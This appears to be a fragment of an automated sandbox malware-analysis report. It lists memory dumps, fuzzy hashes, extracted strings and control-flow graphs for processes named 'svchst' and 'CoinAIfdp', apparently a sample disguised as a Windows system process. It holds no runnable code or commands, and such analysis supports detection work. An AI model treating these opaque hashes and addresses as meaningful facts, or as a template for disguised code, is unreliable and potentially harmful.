                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cfee64476c035c08b97d3c7d185f87538a38cb778d9657881fafc2f92dcf8d90
                      • Instruction ID: 33fd72b8cbbe4482981f022b3b53a98de831608eb4b9f94d043e8ff39177e76e
                      • Opcode Fuzzy Hash: cfee64476c035c08b97d3c7d185f87538a38cb778d9657881fafc2f92dcf8d90
                      • Instruction Fuzzy Hash: B5D0177280120CABDB01EBA5D900A9ABBF9AB46200F5105A9950593260EB714E10ABD6
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 847dcaadde53ed0272d0a1ec14dbfdfad5b4beec47605802bf1da92a4d57546c
                      • Instruction ID: 9792f4168c549e3f0707d73be1c2091434e47bfd69a5f445095e36a5015e3a24
                      • Opcode Fuzzy Hash: 847dcaadde53ed0272d0a1ec14dbfdfad5b4beec47605802bf1da92a4d57546c
                      • Instruction Fuzzy Hash: 51D0177180920CEFCB15DFE4D804A9ABBF8EB0A205F9005E5950A93260EB715E04ABD5
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 746a7a81be8865786201400f85d9d0d56182bd20252b5da06f5d6e3ba13377bb
                      • Instruction ID: 13d8c3a9422c814da1d6cdd263f42bb7266444f22cb599e04f01ee305f7c26e4
                      • Opcode Fuzzy Hash: 746a7a81be8865786201400f85d9d0d56182bd20252b5da06f5d6e3ba13377bb
                      • Instruction Fuzzy Hash: 9FE0EC35814208FFCB15EF94E804A9DBFB9BB46311F508199E90426360D7715A54EB99
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 643156bcbe064fa0cf4dc4ebb47a7bbc650aea2f804c1c1fc9f2334b442da959
                      • Instruction ID: f2b34f692dfc0e2ac1b80efdad738ebe627159db7880bf70c5e5fbca34ab1123
                      • Opcode Fuzzy Hash: 643156bcbe064fa0cf4dc4ebb47a7bbc650aea2f804c1c1fc9f2334b442da959
                      • Instruction Fuzzy Hash: 80D0A72609D7C51FD25613946C6DBF23FA4DB07214B4604D2D9444B8B352520481E2A6
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fbc1d31853df9fdfb7ffff584ed996625dfd6bb122d83a55fc9d3a6fb4a0153
                      • Instruction ID: 02026bbaf3bc3cd5fe27aefa90ad05446ddde495792fc9e70e72d383244bd58f
                      • Opcode Fuzzy Hash: 5fbc1d31853df9fdfb7ffff584ed996625dfd6bb122d83a55fc9d3a6fb4a0153
                      • Instruction Fuzzy Hash: 36E09274D04208AFCB04DF98D945A9CBBB4EB89314F5081A9D81897350D771AE42DB85
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1571004858.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_4f20000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb00b7993ad7b135bc44ff8d8a1915e4fb030f908ae2c1cf446fd84b59cecbf7
                      • Instruction ID: 38c2bab9c37cf5178e06cd9ab8c005de5eebf3a246b4fdbccb78fd5b87aa6a93
                      • Opcode Fuzzy Hash: bb00b7993ad7b135bc44ff8d8a1915e4fb030f908ae2c1cf446fd84b59cecbf7
                      • Instruction Fuzzy Hash: 8AD0177180120CABDB01EBE4D800A9ABBF9AF86201F5105A5950593260EA715A10ABD6
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15b87b37f7d48daf91122253e2d1cbc95fa16ccaa4f9458f5dba67f108b4a4f9
                      • Instruction ID: fcd05f680c34b7cdd4063cbf88b876eca8dc4dde4cf790538ffde7416c06661d
                      • Opcode Fuzzy Hash: 15b87b37f7d48daf91122253e2d1cbc95fa16ccaa4f9458f5dba67f108b4a4f9
                      • Instruction Fuzzy Hash: 1BE01275500208FFCB05DF64D904E597B78FB0A311F104198F90457361C771DD50EB59
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f81fafe3aebb52c05096fa12dfdff183bcc626667aa4c4f3429146d93d2c3d2
                      • Instruction ID: aade7029d89895098202a786e58ea54bfdebc66973747a1bfd09af057614b457
                      • Opcode Fuzzy Hash: 5f81fafe3aebb52c05096fa12dfdff183bcc626667aa4c4f3429146d93d2c3d2
                      • Instruction Fuzzy Hash: 6CE01274914208EFC704DFA8E545E5DBBB8FB4A315F5081D8D90857360C7706E44DB89
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4a4618045d9c3b698a83d5e3c8db73fb7014b8b0fe1a93d3e8611f54966ca874
                      • Instruction ID: 4e46ba39e4c8a85f038ef429f1ac6f8515ddf09f17eac1311727aa65e6a98739
                      • Opcode Fuzzy Hash: 4a4618045d9c3b698a83d5e3c8db73fb7014b8b0fe1a93d3e8611f54966ca874
                      • Instruction Fuzzy Hash: BFF02B79D1962CCFDB218F60C948BECBBB5AF49301F0080EA9809A22A1D7350F84DF65
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1571004858.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_4f20000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ffb80a2df52db56eb1b4485c25863bbdfdf0ca1deb24680cfc556cd5f15641bb
                      • Instruction ID: 4f5f21c0c2de14b563b807ca50c34daf4cce9039bdfb3697bfadc09edb9fdf07
                      • Opcode Fuzzy Hash: ffb80a2df52db56eb1b4485c25863bbdfdf0ca1deb24680cfc556cd5f15641bb
                      • Instruction Fuzzy Hash: 8FE01234D04208EBC704DFA4E941A5DBB74EB45305F508199D80927350C7716E42DB85
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 65546dc5b96d4c52f4c6f2799bd3582643619bcb7ec041f08d3a2749f1e0e61c
                      • Instruction ID: 89c18e4c51a43bf175768266782b275d149a8b8d099d547e6e48c93c5dd662e1
                      • Opcode Fuzzy Hash: 65546dc5b96d4c52f4c6f2799bd3582643619bcb7ec041f08d3a2749f1e0e61c
                      • Instruction Fuzzy Hash: D4D0A7200AE2C05FC32303A42CACFAABF745B07200B0816CAE445470B3C3900415E75A
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d956ddca509586aa183ce7bffc4bbe276ab047e6983cb2d8977ab07d38827b5
                      • Instruction ID: 7c4d5936a5bf02019ef7b9ddb5d0a2a973dae4d609b36548b9832c54e3193e2f
                      • Opcode Fuzzy Hash: 2d956ddca509586aa183ce7bffc4bbe276ab047e6983cb2d8977ab07d38827b5
                      • Instruction Fuzzy Hash: A2E04E78D056189BDB218FA0DD48AEEBBB1BF09300F009595E509A6260D7311E81DF00
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b95b88569910517bba2c521f437ba4cd0ca6c1ffefd697d85e688f7a808264b8
                      • Instruction ID: 154816ef662f640dabf597f2dbb3d705b29db2c1be25a03aff24e1605dff7e6b
                      • Opcode Fuzzy Hash: b95b88569910517bba2c521f437ba4cd0ca6c1ffefd697d85e688f7a808264b8
                      • Instruction Fuzzy Hash: BFD05274819208EFC740EFA8A808B5DBBF8EB0A300F0049A9A808C3210EB704E00AA84
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1571004858.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_4f20000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9fb2e1fdc0c76510bb2a313806c5cfb4a284baaa05c38a182b8291a391677c3b
                      • Instruction ID: 96632fc05c4311c59862c70c6cfd13bd7c2e45a5aaadc926c006ae2bf846cf6c
                      • Opcode Fuzzy Hash: 9fb2e1fdc0c76510bb2a313806c5cfb4a284baaa05c38a182b8291a391677c3b
                      • Instruction Fuzzy Hash: A7D05E74C19248AFC744DBA4A908B6CBFB4AB06302F4001A9D85462390D7741E44EB91
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f2d395af50046a18071f6c0f8633de1e87ddac94e216e1dc71e013fb4330349
                      • Instruction ID: d0aa081f9e22159b82963d20bb876416d3f9105812b9a7a771ab33da3722c8dd
                      • Opcode Fuzzy Hash: 3f2d395af50046a18071f6c0f8633de1e87ddac94e216e1dc71e013fb4330349
                      • Instruction Fuzzy Hash: F5D0A76882C2945AEB0247A4B80AF207FBC5303318F440054E258411E2C7A52484F65A
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e8b144cb1b789da2a0820141fa65be50c8afc108b881295a4d97097a07951c9c
                      • Instruction ID: 05ff4469d8cfed6f5cbd400ecd11432aa6b8f174ea1a5a56ec4515a587c83720
                      • Opcode Fuzzy Hash: e8b144cb1b789da2a0820141fa65be50c8afc108b881295a4d97097a07951c9c
                      • Instruction Fuzzy Hash: 19B02B3403830547C1011784B80CB3133DC7303305F801410920C0047047F11410E189
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 092f84d2d577ca2bac1953690e93268796825620736d7af1ec6eca7de4bb6a77
                      • Instruction ID: c5a20ff048b75809cf32a68beeb1e424f37b5479ead581109b95989d390e5b07
                      • Opcode Fuzzy Hash: 092f84d2d577ca2bac1953690e93268796825620736d7af1ec6eca7de4bb6a77
                      • Instruction Fuzzy Hash: 36C012B09002289FE714DBA4CEC8BBA7775ABC5305F009095A209A2120CB340C808A28
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ba9f9b2cab1852fbd4880ceef5bb2db65c3bf1e138b0700ba79134135ad74ada
                      • Instruction ID: 95b7659846ec14b2ade464ba886a2f8f113c5cdec436279568c5bff140a23304
                      • Opcode Fuzzy Hash: ba9f9b2cab1852fbd4880ceef5bb2db65c3bf1e138b0700ba79134135ad74ada
                      • Instruction Fuzzy Hash: F1D0C974919348CFDB01CF88D444B9CBBB1FB09311F51689AD405A3241C3718888EF05
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89662c2c6e78b801677f7e143e4e01ead2f6523df7e975c99266199191aaf2f9
                      • Instruction ID: 1c37c8d8f56c4fe97832eeeaadc52d872f315c65ec63429c8411dc916135fcbd
                      • Opcode Fuzzy Hash: 89662c2c6e78b801677f7e143e4e01ead2f6523df7e975c99266199191aaf2f9
                      • Instruction Fuzzy Hash: F3C00238A56718CBEB218B60DC8CFADBB35BF8A709F109095D80D363E1C6701D84DE00
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1566608123.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_2530000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ea3d29b4930d999c77e463acd452ac0c39224c54ec3236db9dfd8f95cd170e05
                      • Instruction ID: c46818348c865e6bbc18ada888b79a3e591ecb58dec08b24c3d5d4620806a960
                      • Opcode Fuzzy Hash: ea3d29b4930d999c77e463acd452ac0c39224c54ec3236db9dfd8f95cd170e05
                      • Instruction Fuzzy Hash: 1EC00278814628CBDF164BA0CD88BA8BB75BB49305F005085945D662618A350994EF10

                      Execution Graph

                      Execution Coverage:18.6%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:6
                      Total number of Limit Nodes:0
                      execution_graph 18502 4fe3e18 18503 4fe3e60 VirtualAlloc 18502->18503 18504 4fe3ecc 18503->18504 18505 4fe4040 18506 4fe408d CreateThread 18505->18506 18507 4fe410f 18506->18507

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 1014748-1014769 1 1014770-101484f 0->1 2 101476b 0->2 4 1014855-1014996 call 1010da0 1->4 5 1014f46-1014f6e 1->5 2->1 51 101499c-10149f7 4->51 52 1014f0f-1014f39 4->52 8 1015674-101567d 5->8 10 1015683-101569a 8->10 11 1014f7c-1014f86 8->11 12 1014f88 11->12 13 1014f8d-1015081 call 1010da0 11->13 12->13 34 1015083-101508f 13->34 35 10150ab 13->35 37 1015091-1015097 34->37 38 1015099-101509f 34->38 36 10150b1-10150d1 35->36 42 1015131-10151b1 36->42 43 10150d3-101512c 36->43 40 10150a9 37->40 38->40 40->36 62 10151b3-1015206 42->62 63 1015208-101524b call 1010da0 42->63 57 1015671 43->57 59 10149f9 51->59 60 10149fc-1014a07 51->60 65 1014f43-1014f44 52->65 66 1014f3b 52->66 57->8 59->60 64 1014e21-1014e27 60->64 90 1015256-101525f 62->90 63->90 67 1014e2d-1014eaa call 1010170 64->67 68 1014a0c-1014a2a 64->68 65->5 66->65 109 1014ef9-1014eff 67->109 70 1014a81-1014a96 68->70 71 1014a2c-1014a30 68->71 77 1014a98 70->77 78 1014a9d-1014ab3 70->78 71->70 75 1014a32-1014a3d 71->75 81 1014a73-1014a79 75->81 77->78 79 1014ab5 78->79 80 1014aba-1014ad1 78->80 79->80 85 1014ad3 80->85 86 1014ad8-1014aee 80->86 88 1014a7b-1014a7c 81->88 89 1014a3f-1014a43 81->89 85->86 93 1014af0 86->93 94 1014af5-1014afc 86->94 96 1014aff-1014b41 88->96 91 1014a45 89->91 92 1014a49-1014a61 89->92 97 10152bf-10152ce 90->97 91->92 98 1014a63 92->98 99 1014a68-1014a70 92->99 93->94 94->96 100 1014b43-1014b4f 96->100 101 1014b55-1014d25 96->101 103 1015261-1015289 97->103 104 10152d0-1015358 97->104 98->99 99->81 100->101 111 1014d27-1014d2b 101->111 112 1014d89-1014d9e 101->112 105 1015290-10152b9 103->105 106 101528b 103->106 139 10154d1-10154dd 104->139 105->97 106->105 114 1014f01-1014f07 109->114 115 1014eac-1014ef6 109->115 111->112 113 1014d2d-1014d3c 111->113 117 1014da0 112->117 118 1014da5-1014dc6 112->118 119 1014d7b-1014d81 113->119 114->52 115->109 117->118 120 1014dc8 118->120 121 1014dcd-1014dec 118->121 126 1014d83-1014d84 119->126 127 1014d3e-1014d42 119->127 120->121 123 1014df3-1014e13 121->123 124 1014dee 121->124 132 1014e15 123->132 133 1014e1a 123->133 124->123 134 1014e1e 126->134 130 1014d44-1014d48 127->130 131 1014d4c-1014d6d 127->131 130->131 135 1014d74-1014d78 131->135 136 1014d6f 131->136 132->133 133->134 134->64 135->119 136->135 141 10154e3-101553e 139->141 142 101535d-1015366 139->142 157 1015540-1015573 141->157 158 1015575-101559f 141->158 143 1015368 142->143 144 101536f-10154c5 142->144 143->144 146 1015375-10153b5 143->146 147 1015444-1015484 143->147 148 10153ba-10153fa 143->148 149 10153ff-101543f 143->149 162 10154cb 144->162 146->162 147->162 148->162 149->162 166 10155a8-101563b 157->166 158->166 162->139 170 1015642-1015662 166->170 170->57
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1590971317.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_1010000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq$Teq$pq$xbq
                      • API String ID: 0-2466396065
                      • Opcode ID: 2224bec3ed8f388bd2761844f0de32f174064866cc33e083cc18e6573d5f5510
                      • Instruction ID: e159e308187a27a2f37a314493ef3485ad0debe02c9e6c7c50a2b8ba96aa84d4
                      • Opcode Fuzzy Hash: 2224bec3ed8f388bd2761844f0de32f174064866cc33e083cc18e6573d5f5510
                      • Instruction Fuzzy Hash: 3AA2B375A00228CFDB65CF69C984A9DBBB2FF89304F1581E9D549AB225DB319E81CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 172 1018b70-1018b9e 173 1018ba0 172->173 174 1018ba5-1018cc4 172->174 173->174 177 1018cd3-1018cdf 174->177 178 1018cc6-1018ccd call 101b2c2 174->178 179 1018ce1 177->179 180 1018ce6-1018ceb 177->180 178->177 179->180 181 1018d23-1018d6c 180->181 182 1018ced-1018cf9 180->182 191 1018d73-1018f8c 181->191 192 1018d6e 181->192 183 1018d00-1018d1e 182->183 184 1018cfb 182->184 186 101a1d0-101a1d6 183->186 184->183 187 101a201 186->187 188 101a1d8-101a1f8 186->188 190 101a202 187->190 188->187 190->190 214 10199bc-10199c8 191->214 192->191 215 1018f91-1018f9d 214->215 216 10199ce-1019a06 214->216 217 1018fa4-10190c9 215->217 218 1018f9f 215->218 225 1019ab5-1019abb 216->225 252 1019109-1019192 217->252 253 10190cb-1019103 217->253 218->217 226 1019ac1-1019af9 225->226 227 1019a0b-1019a36 225->227 240 1019cf8-1019cfe 226->240 235 1019a42-1019a5d 227->235 237 1019a90-1019ab2 235->237 238 1019a5f-1019a63 235->238 237->225 238->237 241 1019a65-1019a8d 238->241 242 1019d04-1019d4c 240->242 243 1019afe-1019c29 240->243 241->237 249 1019dc7-1019e12 242->249 250 1019d4e-1019dc1 242->250 290 1019c96-1019c9a 243->290 291 1019c2b-1019c94 243->291 272 101a19a-101a1a0 249->272 250->249 279 10191a1-1019225 252->279 280 1019194-101919c 252->280 253->252 274 1019e17-1019e99 272->274 275 101a1a6-101a1ce 272->275 294 1019ec1-1019ecd 274->294 295 1019e9b-1019eb6 274->295 275->186 313 1019234-10192b8 279->313 314 1019227-101922f 279->314 282 10199ad-10199b9 280->282 282->214 296 1019ccc-1019cde 290->296 297 1019c9c-1019cca 290->297 307 1019cdf-1019cf5 291->307 300 1019ed4-1019ee0 294->300 301 1019ecf 294->301 295->294 296->307 297->307 303 1019ef3-1019f02 300->303 304 1019ee2-1019eee 300->304 301->300 310 1019f04 303->310 311 1019f0b-101a162 303->311 309 101a181-101a197 304->309 307->240 309->272 310->311 315 1019f11-1019f4f 310->315 316 1019fd1-101a03a 310->316 317 1019f54-1019fcc 310->317 318 101a0ad-101a0ea 310->318 319 101a03f-101a0a8 310->319 341 101a16d-101a179 311->341 353 10192c7-101934b 313->353 354 10192ba-10192c2 313->354 314->282 315->341 316->341 317->341 340 101a133-101a139 318->340 319->341 345 101a13b-101a145 340->345 346 101a0ec-101a11f 340->346 341->309 345->341 350 101a121 346->350 351 101a126-101a130 346->351 350->351 351->340 360 101935a-10193de 353->360 361 101934d-1019355 353->361 354->282 367 10193e0-10193e8 360->367 368 10193ed-1019471 360->368 361->282 367->282 374 1019480-1019504 368->374 375 1019473-101947b 368->375 381 1019513-1019597 374->381 382 1019506-101950e 374->382 375->282 388 10195a6-101962a 381->388 389 1019599-10195a1 381->389 382->282 395 1019639-10196bd 388->395 396 101962c-1019634 388->396 389->282 402 10196cc-1019750 395->402 403 10196bf-10196c7 395->403 396->282 409 1019752-101975a 402->409 410 101975f-10197e3 402->410 403->282 409->282 416 10197f2-1019876 410->416 417 10197e5-10197ed 410->417 423 1019885-1019909 416->423 424 1019878-1019880 416->424 417->282 430 1019918-101999c 423->430 431 101990b-1019913 423->431 424->282 437 10199a8-10199aa 430->437 438 101999e-10199a6 430->438 431->282 437->282 438->282
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1590971317.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_1010000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2$$q
                      • API String ID: 0-2017333547
                      • Opcode ID: 9715ca2469afa4004c722868af3e716cf161dab4c54c9db44a514246fbee2a86
                      • Instruction ID: cd0476167fe017b0332f6b973f58fa115e9a95fe98bde444ccf7066c14c492e8
                      • Opcode Fuzzy Hash: 9715ca2469afa4004c722868af3e716cf161dab4c54c9db44a514246fbee2a86
                      • Instruction Fuzzy Hash: A5D2E4B4A012288FDB65DF69D955B9EBBF2FB88304F1081E9D509A7355DB30AE81CF40
                      Memory Dump Source
                      • Source File: 00000010.00000002.1590971317.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_1010000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 645713785d8d7670918b1998a2734aba05476aeb896eec362db4554aa6b68a19
                      • Instruction ID: 6907dbac463236d7ea87448c0ba881f3a683c16e16a07d6d1c95810f0efabda6
                      • Opcode Fuzzy Hash: 645713785d8d7670918b1998a2734aba05476aeb896eec362db4554aa6b68a19
                      • Instruction Fuzzy Hash: 8042A1B4A05269CFDB64DF28C988B9DBBB6FB88300F1081D9D54DA7355DB30AE818F54
                      Memory Dump Source
                      • Source File: 00000010.00000002.1590971317.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_1010000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c75adea2bc464127eb6f873f901d718269fd26b0737147aea52d3b33ff7e84df
                      • Instruction ID: ac0616aefe75d0f034583d550a41e51093f1f20e69d64cf04ccfa11cd1c0dc50
                      • Opcode Fuzzy Hash: c75adea2bc464127eb6f873f901d718269fd26b0737147aea52d3b33ff7e84df
                      • Instruction Fuzzy Hash: 6CC1F2B4D05268CFDB64CFA9C948BDDBBF1AB49314F1085A9C48DAB259D7788AC4CF40
                      Memory Dump Source
                      • Source File: 00000010.00000002.1590971317.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_1010000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0ff41441d13830fd82ae80eaeeb1d9090e31f43d15c35d10c547e2b9a4c6156d
                      • Instruction ID: 229dd9d6b8e59ab7d9fd44c8be48f862f035fa8ef608c634fcd58976cf3bccdc
                      • Opcode Fuzzy Hash: 0ff41441d13830fd82ae80eaeeb1d9090e31f43d15c35d10c547e2b9a4c6156d
                      • Instruction Fuzzy Hash: ED51FDB1E046188BEB18CF6BD94568EFBF3BFC8300F14C1AAD548A7259DB3409418F54
                      Memory Dump Source
                      • Source File: 00000010.00000002.1596972976.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_53b0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0c59fc6520f58d13a8f9ccadba62bc922fb4f024e80fca0af91272114f9afac
                      • Instruction ID: d84c103257ac9a6ca022435bdbf6e5716ac2c1e7a4f5821a9115ed41e088f9b7
                      • Opcode Fuzzy Hash: e0c59fc6520f58d13a8f9ccadba62bc922fb4f024e80fca0af91272114f9afac
                      • Instruction Fuzzy Hash: B721B471D056189FEB18CFAAC95469EBBF7BF88301F14C0AA8419AB664EB705946CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 440 53b71d0-53b71d7 441 53b71dd-53b71de 440->441 442 53be417-53be452 440->442 441->442 447 53be45a-53be461 442->447
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1596972976.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_53b0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0$Y
                      • API String ID: 0-947205236
                      • Opcode ID: c513f1a62c118a352e7d1fd82d48f2c94ab6b89f39add22c2cb0a881ad832829
                      • Instruction ID: d3e6eb2e22557d6970758d59635c0ebd9829ac52030e3b822cc6b9c57f89b6c6
                      • Opcode Fuzzy Hash: c513f1a62c118a352e7d1fd82d48f2c94ab6b89f39add22c2cb0a881ad832829
                      • Instruction Fuzzy Hash: 22F01C34941218CFEB28EF14D8ADBE9777ABF84344F400098D20A676A0DF745D86EF04

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 448 53b0506-53b053f 451 53b00fc-53b0107 448->451 452 53b0545-53b0550 448->452 453 53b0109-53b452c call 53cff80 451->453 454 53b0110-53b0389 451->454 452->451 458 53b4532-53b4574 453->458 454->451 463 53b038f-53b039a 454->463 458->451 464 53b457a-53b4585 458->464 463->451 464->451
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1596972976.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_53b0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: X$h
                      • API String ID: 0-795848406
                      • Opcode ID: 34caec66d3869d9b3ca65f6693f7f112a84cc0c6c35eafc22bb27b69a0fa3426
                      • Instruction ID: 70f534f8b2de705e629b733cf794326edb5a51c5c42a67574721f9571c9e91db
                      • Opcode Fuzzy Hash: 34caec66d3869d9b3ca65f6693f7f112a84cc0c6c35eafc22bb27b69a0fa3426
                      • Instruction Fuzzy Hash: 60F0C978950269CFEB29DF14C959BDABB76BB04305F0044E5DA0963A80E7B54A84DF01

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 466 4fe4038-4fe410d CreateThread 468 4fe410f-4fe4115 466->468 469 4fe4116-4fe414e 466->469 468->469
                      APIs
                      • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 04FE40FD
                      Memory Dump Source
